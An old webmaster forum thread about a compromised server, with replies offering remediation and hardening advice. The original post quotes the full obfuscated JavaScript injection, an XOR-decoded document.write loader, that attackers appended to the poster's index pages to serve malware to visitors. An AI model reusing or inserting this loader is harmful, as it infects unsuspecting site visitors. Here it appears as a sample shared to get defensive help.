server hacked! Need help please...

[Vippy]

Hey guys

Im hoping someone can help me here with a problem i am having on a couple of my member sites being hacked.

Someone is managing to hack into my FTP server and inbedding a hidden remote file which is inserting malicious codes on my index page, that contain viruses via external url's. So anyone who reaches my index pages is hit with a trojan detection through there firewall!

The code which gets inbedded is always at the bottom of the index source code and it looks like this:

<script language="JavaScript">e = '0x00' + '5F';str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7% BE%B7%B4%B7%AC%A7%E6%B8%B7%BC%BC%BB%B2%FE%E2%E4%B7 %BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F 1%F1%A9%BB%AC%AE%B7%BD%B2%AC%F2%B7%B2%BA%B1%F1%B4% BC%F1%AB%B0%B4%EF%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF%C0 %B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%B B%E2%E4%F1%BC%B7%AA%E2";str=tmp='';for(i=0;i<str1. length;i+=3){tmp =unescape(str1.slice(i,i+3));str=str+String.fromCh arCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

When i upload my local clean copy of the index page it was over writing the infected file and he would pop up again with this code every 1 - 2 weeks.

The only further solution i have managed to find so far is to restrict FTP access from anywhere other than my local IP. Then we managed to detect this guy is in Russia and was accessing the remote file without using FTP and we banned all IP's from Russia! However i fear this is only a temporary solution as he can figure this out and spoof his IP address.

Anyone have any ideas what else i can do to keep this ass hole away??

[masterut]

Contact info?

[martinsc]

i think some else had the same issue some weeks ago... try searching gfy's history a bit...

[martinsc]

edit: sorry wrong link...
ignore this...

[modF]

Check to see if there is a .htaccess file which is adding a header/footer. Contact your host to figure out which one of your scripts/passwords are insecure.

[aidantrent]

When a server has been comprised, you *must* reformat the drive and reload the OS. There is no other way to be 100% certain that you've closed all of the backdoors the attacker may have setup.

Once you have the OS reinstalled, here are a couple of security tips to prevent this from happening in the future:

* Run security updates on a daily basis. With Debian-derived systems, this is as simple as 'aptitude update && aptitude upgrade'. Don't forget any custom-installed scripts when you're doing this! For instance, if you run something like ComusThumbs or ArrowTrader, be sure to regularly check their home pages for security announcements.

* Never use any unencrypted services for authentication. You mentioned FTP; anyone can sniff the network traffic and grab your FTP password. Use scp or SFTP instead. The same goes for e-mail: use TLS or SSL SMTP connections for sending mail, and SSL POP or IMAP for receiving it. If you have any web-based control panels, make sure they run over HTTPS, not HTTP. And of course, *never* use telnet to remote-connect.

Personally, on each of my dedicated boxes, the first thing I do is uninstall the unencrypted versions of every server except HTTP and SMTP; it makes it much easier to be certain that all users are using secure logins when things like FTP and POP3 aren't even available Then I setup certificates to enable TLS over SMTP for sending mail (you need to have an unencrypted SMTP server listening for other servers sending mail to you) and an HTTPS server for all of my web control panels, like phpMyAdmin.

Anyway, good luck get your server back online!